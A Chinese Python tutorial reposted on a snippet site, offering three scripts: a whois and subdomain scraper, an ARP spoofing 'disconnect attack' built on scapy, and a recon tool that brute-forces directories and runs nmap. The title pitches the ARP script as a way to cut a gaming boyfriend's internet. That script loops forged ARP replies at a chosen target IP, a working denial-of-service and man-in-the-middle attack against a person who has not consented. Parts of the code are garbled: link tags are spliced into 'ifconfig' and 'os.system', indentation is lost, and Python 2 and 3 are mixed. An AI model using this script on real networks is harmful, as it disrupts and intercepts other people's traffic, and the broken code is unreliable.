如果你的男友只顾着打游戏!断网攻击了解一下?Python工具已备好

前言

为了满足新手对Python的追求,特写了三个初级Python入门工具。第一期写了三个初级工具,希望新手看完以后可以对Python的脚本有一个基本了解。高手请绕过此文章

一件套 pythond requests模块构造一个whois信息收集器 二件套 python编写一个arp断网攻击 三件套 目录信息收集

进群:548377875  即可获取数十套PDF哦!

一件套前言: 带给想写项目但无从下手的朋友们,这些脚本都比较容易理解。

简单梳理一下此工具需要具备哪些功能。脚本获取信息如下:

  • IP信息
  • 子域名
  • 备案
  • 注册
  • 邮箱
  • 地址
  • 电话
  • DNS

具体操作如下:

我们要用到的模块是requests

python环境:py3

安装方法:pip install requests或python steup.py install

通过http://site.ip138.com来进行查询

  • http://site.ip138.com/输入你要查询的域名/domain.html #这个目录用于查询IP解析记录
  • htp://site.ip138.com/输入你要查询的域名/beian.html #这个用于查询子域名
  • http://site.ip138.com/输入你要查询的域名/whois.html #这个用于进行whois查询

好了现在我们开始构造我们的代码代码里面有详细的注释

#首先我们要导入requests模块和bs4模块里的BeautifulSoup和time模块
import requests
import time
from bs4 import BeautifulSoup
#设置好开始时间点
strat=time.time()
def chax():
 #询问用户查询的域名
 lid=input('请输入你要查询的域名:')
 #设置浏览器头过反爬
 head={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/63.0.3239.132 Safari/537.36'}
 #设置好url
 url="http://site.ip138.com/{}/".format(lid)
 urldomain="http://site.ip138.com/{}/domain.htm".format(lid)
 url2="http://site.ip138.com/{}/beian.htm".format(lid)
 url3="http://site.ip138.com/{}/whois.htm".format(lid)
 #打开网页
 rb=requests.get(url,headers=head)
 rb1=requests.get(urldomain,headers=head)
 rb2=requests.get(url2,headers=head)
 rb3=requests.get(url3,headers=head)
 #获取内容并用html的方式返回
 gf=BeautifulSoup(rb.content,'html.parser')
 print('[+]IP解析记录')
 #读取内容里的p标签
 for x in gf.find_all('p'):
 #使用text的内容返回
 link=x.get_text()
 print(link)
gf1=BeautifulSoup(rb1.content,'html.parser')
print('[+]子域名查询')
for v in gf1.find_all('p'):
 link2=v.get_text()
 print(link2)
gf2=BeautifulSoup(rb2.content,'html.parser')
print('[+]备案查询')
for s in gf2.find_all('p'):
 link3=s.get_text()
 print(link3)
gf3=BeautifulSoup(rb3.content,'html.parser')
print('[+]whois查询')
for k in gf3.find_all('p'):
 link4=k.get_text()
 print(link4)
chax()
end=time.time()
print('查询耗时:',end-strat)

如果你的男友只顾着打游戏!断网攻击了解一下?Python工具已备好

二件套: 使用python编写一个arp断网攻击 2.介绍scapy模块

3.安装scanpy模块

4.编写arp攻击的脚本

你们知道arp攻击的原理吗?如果不知道不要紧,下面开始介绍:

arp攻击原理:通过伪造IP地址与MAC地址实现ARP欺骗,在网络发送大量ARP通信量。攻击者

只要持续不断发送arp包就能造成中间人攻击或者断网攻击。(PS:我们只需要scapy里的一些参数就可以实现)

scapy介绍: Scapy是一个Python程序,使用户能够发送,嗅探和剖析和伪造网络数据包。此功能允许构建可以探测,扫描或攻击网络的工具。

换句话说,Scapy是一个功能强大的交互式数据包处理程序。它能够伪造或解码大量协议的数据包,在线上发送,捕获,匹配请求和回复等等。Scapy可以轻松处理大多数经典任务,如扫描,追踪,探测,单元测试,攻击或网络发现。它可以替代hping,arpspoof,arp-sk,arping,pf,甚至是Nmap,tcpdump和tshark的某些部分。scapy的一个小例子:

ps:scapy正确的食用手册请认真看完介绍和部分基础:https://phaethon.github.io/scapy/api/introduction.html

安装scapy:

py2安装方法

pip install scapy

py3安装方法

pip install scapy3

更多的安装方法:https://phaethon.github.io/scapy/api/installation.html

我的系统环境是:Kali Linux下

各位读者可以考虑一些使用以下系统环境:

Centos

Ubuntu

Mac os

ps:尽量不要使用windows,windows会报错!

缺少windows.dll,具体这个dll安装后会不会又报错官方没给出答复

编写攻击的脚本: Ether是构造网络数据包 ARP进行ARP攻击 sendp进行发包

 import os
    import sys
    from scapy.layers.l2 import getmacbyip
    from scapy.all import (
    Ether,ARP,sendp
    )

执行查看IP的命令

ifcon<a href="https://www.jb51.cc/tag/fig/" target="_blank" class="keywords">fig</a>=os.sy<a href="https://www.jb51.cc/tag/stem/" target="_blank" class="keywords">stem</a>('ifcon<a href="https://www.jb51.cc/tag/fig/" target="_blank" class="keywords">fig</a>')
print ifcon<a href="https://www.jb51.cc/tag/fig/" target="_blank" class="keywords">fig</a>
gmac=raw_input('Please enter gateway IP:')
liusheng=raw_input('Please enter your IP:')
liusrc=raw_input('Please enter target IP:')
try:

获取目标的mac

tg=getmacbyip(liusrc)
print tg
except Exception,f:

print '[-]{}'.format(f)
exit()
def arpspoof():
try:
eth=Ether()
arp=ARP(
op="is-at",#arp响应
hwsrc=gmac,#网关mac
psrc=liusheng,#网关IP
hwdst=tg,#目标Mac
pdst=liusrc#目标IP
)

对配置进行输出

print ((eth/arp).show())

开始发包

sendp(eth/arp,inter=2,loop=1)
except Exception,g:
print '[-]{}'.format(g)
exit()
arpspoof()

如果你的男友只顾着打游戏!断网攻击了解一下?Python工具已备好

从受害者角度看

如果你的男友只顾着打游戏!断网攻击了解一下?Python工具已备好

三件套: 俗话说的话想要挖web漏洞就必须做好前面的信息收集 下面我们来写一个收集信息的脚本。

准备:

安装好requests,bs4模块: pip install requests pip install bs4 或者去下载好对应的模块压缩包 然后找到steup.py执行python steup.py install

思路: 使用requests.headers()获取http头部信息 通过htp响应码来判断robots是否存在 通过http响应码判断存在的目录 通过nmap判断开放的端口(PS:这里我是使用os模块来进行nmap命令扫描)我这边的nmap模块一调用,nmap就会出现停止运行 通过爬取某网站获得对应的whois,IP反查域名的信息。

开始:

import requests
import os
import socket
from bs4 import BeautifulSoup
import time
#获取http指纹
def Webfingerprintcollection():
 global lgr
 lgr=input('请输入目标域名:')
 url="http://{}".format(lgr)
 header={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/63.0.3239.132 Safari/537.36'}
 r=requests.get(url,headers=header)
 xyt=r.headers
 for key in xyt:
 print(key,':',xyt[key])
Webfingerprintcollection()
print('================================================')
#判断有无robots.txt
def robots():
 urlsd="http://{}/robots.txt".format(lgr)
 header = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/63.0.3239.132 Safari/537.36'}
 gf=requests.get(urlsd,headers=header,timeout=8)
 if gf.status_code == 200:
 print('robots.txt存在')
 print('[+]该站存在robots.txt',urlsd)
 else:
 print('[-]没有robots.txt')
robots()
print("=================================================")
#目录扫描
def Webdirectoryscanner():
 dict=open('build.txt','r',encoding='utf-8').read().split('
')
 for xyt in dict:
 try:
 header = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/63.0.3239.132 Safari/537.36'}
 urljc="http://"+lgr+"{}".format(xyt)
 rvc=requests.get(urljc,timeout=8)
 if rvc.status_code == 200:
 print('[*]',urljc)
 except:
 print('[-]远程主机强迫关闭一个现有的连接')
Webdirectoryscanner()
print("=====================================================")
s = socket.gethostbyname(lgr)
#端口扫描
def portscanner():
 o=os.system('nmap {} program'.format(s))
 print(o)
portscanner()
print('======================================================')
#whois查询
def whois():
 heads={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/63.0.3239.132 Safari/537.36'}
 urlwhois="http://site.ip138.com/{}/whois.htm".format(lgr)
 rvt=requests.get(urlwhois,headers=heads)
 bv=BeautifulSoup(rvt.content,"html.parser")
 for line in bv.find_all('p'):
 link=line.get_text()
 print(link)
whois()
print('======================================================')
#IP反查域名
def IPbackupdomainname():
 wu=socket.gethostbyname(lgr)
 rks="http://site.ip138.com/{}/".format(wu)
 rod={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/63.0.3239.132 Safari/537.36'}
 sjk=requests.get(rks,headers=rod)
 liverou=BeautifulSoup(sjk.content,'html.parser')
 for low in liverou.find_all('li'):
 bc=low.get_text()
 print(bc)
IPbackupdomainname()
print('=======================================================')

如果你的男友只顾着打游戏!断网攻击了解一下?Python工具已备好

如果你的男友只顾着打游戏!断网攻击了解一下?Python工具已备好

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐


我最近重新拾起了计算机视觉,借助Python的opencv还有face_recognition库写了个简单的图像识别demo,额外定制了一些内容,原本想打包成exe然后发给朋友,不过在这当中遇到了许多小问题,都解决了,记录一下踩过的坑。 1、Pyinstaller打包过程当中出现warning,跟d
说到Pooling,相信学习过CNN的朋友们都不会感到陌生。Pooling在中文当中的意思是“池化”,在神经网络当中非常常见,通常用的比较多的一种是Max Pooling,具体操作如下图: 结合图像理解,相信你也会大概明白其中的本意。不过Pooling并不是只可以选取2x2的窗口大小,即便是3x3,
记得大一学Python的时候,有一个题目是判断一个数是否是复数。当时觉得比较复杂不好写,就琢磨了一个偷懒的好办法,用异常处理的手段便可以大大程度帮助你简短代码(偷懒)。以下是判断整数和复数的两段小代码: 相信看到这里,你也有所顿悟,能拓展出更多有意思的方法~
文章目录 3 直方图Histogramplot1. 基本直方图的绘制 Basic histogram2. 数据分布与密度信息显示 Control rug and density on seaborn histogram3. 带箱形图的直方图 Histogram with a boxplot on t
文章目录 5 小提琴图Violinplot1. 基础小提琴图绘制 Basic violinplot2. 小提琴图样式自定义 Custom seaborn violinplot3. 小提琴图颜色自定义 Control color of seaborn violinplot4. 分组小提琴图 Group
文章目录 4 核密度图Densityplot1. 基础核密度图绘制 Basic density plot2. 核密度图的区间控制 Control bandwidth of density plot3. 多个变量的核密度图绘制 Density plot of several variables4. 边
首先 import tensorflow as tf tf.argmax(tenso,n)函数会返回tensor中参数指定的维度中的最大值的索引或者向量。当tensor为矩阵返回向量,tensor为向量返回索引号。其中n表示具体参数的维度。 以实际例子为说明: import tensorflow a
seaborn学习笔记章节 seaborn是一个基于matplotlib的Python数据可视化库。seaborn是matplotlib的高级封装,可以绘制有吸引力且信息丰富的统计图形。相对于matplotlib,seaborn语法更简洁,两者关系类似于numpy和pandas之间的关系,seabo
Python ConfigParser教程显示了如何使用ConfigParser在Python中使用配置文件。 文章目录 1 介绍1.1 Python ConfigParser读取文件1.2 Python ConfigParser中的节1.3 Python ConfigParser从字符串中读取数据
1. 处理Excel 电子表格笔记(第12章)(代码下载) 本文主要介绍openpyxl 的2.5.12版处理excel电子表格,原书是2.1.4 版,OpenPyXL 团队会经常发布新版本。不过不用担心,新版本应该在相当长的时间内向后兼容。如果你有新版本,想看看它提供了什么新功能,可以查看Open
1. 发送电子邮件和短信笔记(第16章)(代码下载) 1.1 发送电子邮件 简单邮件传输协议(SMTP)是用于发送电子邮件的协议。SMTP 规定电子邮件应该如何格式化、加密、在邮件服务器之间传递,以及在你点击发送后,计算机要处理的所有其他细节。。但是,你并不需要知道这些技术细节,因为Python 的
文章目录 12 绘图实例(4) Drawing example(4)1. Scatterplot with varying point sizes and hues(relplot)2. Scatterplot with categorical variables(swarmplot)3. Scat
文章目录 10 绘图实例(2) Drawing example(2)1. Grouped violinplots with split violins(violinplot)2. Annotated heatmaps(heatmap)3. Hexbin plot with marginal dist
文章目录 9 绘图实例(1) Drawing example(1)1. Anscombe’s quartet(lmplot)2. Color palette choices(barplot)3. Different cubehelix palettes(kdeplot)4. Distribution
Python装饰器教程展示了如何在Python中使用装饰器基本功能。 文章目录 1 使用教程1.1 Python装饰器简单示例1.2 带@符号的Python装饰器1.3 用参数修饰函数1.4 Python装饰器修改数据1.5 Python多层装饰器1.6 Python装饰器计时示例 2 参考 1 使
1. 用GUI 自动化控制键盘和鼠标第18章 (代码下载) pyautogui模块可以向Windows、OS X 和Linux 发送虚拟按键和鼠标点击。根据使用的操作系统,在安装pyautogui之前,可能需要安装一些其他模块。 Windows: 不需要安装其他模块。OS X: sudo pip3
文章目录 生成文件目录结构多图合并找出文件夹中相似图像 生成文件目录结构 生成文件夹或文件的目录结构,并保存结果。可选是否滤除目录,特定文件以及可以设定最大查找文件结构深度。效果如下: root:[z:/] |--a.py |--image | |--cat1.jpg | |--cat2.jpg |
文章目录 VENN DIAGRAM(维恩图)1. 具有2个分组的基本的维恩图 Venn diagram with 2 groups2. 具有3个组的基本维恩图 Venn diagram with 3 groups3. 自定义维恩图 Custom Venn diagram4. 精致的维恩图 Elabo
mxnet60分钟入门Gluon教程代码下载,适合做过深度学习的人使用。入门教程地址: https://beta.mxnet.io/guide/getting-started/crash-course/index.html mxnet安装方法:pip install mxnet 1 在mxnet中使
文章目录 1 安装2 快速入门2.1 基本用法2.2 输出图像格式2.3 图像style设置2.4 属性2.5 子图和聚类 3 实例4 如何进一步使用python graphviz Graphviz是一款能够自动排版的流程图绘图软件。python graphviz则是graphviz的python实